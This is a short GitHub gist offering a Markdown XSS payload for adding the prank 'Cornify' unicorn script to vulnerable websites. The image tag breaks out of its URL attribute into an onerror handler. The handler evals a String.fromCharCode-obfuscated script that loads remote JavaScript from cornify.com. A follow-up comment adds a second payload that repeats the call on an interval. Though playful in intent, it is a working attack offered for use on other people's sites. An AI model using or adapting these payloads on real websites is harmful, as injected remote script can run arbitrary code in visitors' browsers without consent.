Skip to content

Instantly share code, notes, and snippets.

@mediaupstream

mediaupstream/gist:3857950

Created October 9, 2012 10:55
Show Gist options
  • Star 1 You must be signed in to star a gist
  • Fork 2 You must be signed in to fork a gist
  • Save mediaupstream/3857950 to your computer and use it in GitHub Desktop.
Save mediaupstream/3857950 to your computer and use it in GitHub Desktop.
Download ZIP
Cornify XSS Markdown
Raw
gistfile1.md

Want to add Cornify (http://www.cornify.com/) to a website that has a Markdown XSS exploit?

![uh](http://example.com"onerror="javascript:eval\(String\.fromCharCode\(118,97,114,32,115,61,100,111,99,117,109,101,110,116,46,99,114,101,97,116,101,69,108,101,109,101,110,116,40,39,115,99,114,105,112,116,39,41,59,32,115,46,115,114,99,61,39,104,116,116,112,58,47,47,119,119,119,46,99,111,114,110,105,102,121,46,99,111,109,47,106,115,47,99,111,114,110,105,102,121,46,106,115,39,59,100,111,99,117,109,101,110,116,46,103,101,116,69,108,101,109,101,110,116,115,66,121,84,97,103,78,97,109,101,40,39,104,101,97,100,39,41,91,48,93,46,97,112,112,101,110,100,67,104,105,108,100,40,115,41,59,32,115,101,116,84,105,109,101,111,117,116,40,102,117,110,99,116,105,111,110,40,41,123,32,99,111,114,110,105,102,121,95,97,100,100,40,41,32,125,44,32,49,48,48,48,41,59\)\))

The above code does this:

var s=document.createElement('script'); s.src='http://www.cornify.com/js/cornify.js';document.getElementsByTagName('head')[0].appendChild(s); setTimeout(function(){ cornify_add() }, 1000);
@mediaupstream
Copy link
Author

now that you have the script loaded, you can set an interval to "cornify_add()" :D

![uh](http://example.com"onerror="javascript:setInterval\(function\(\)\{cornify\_add\(\)\},1200\))

Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment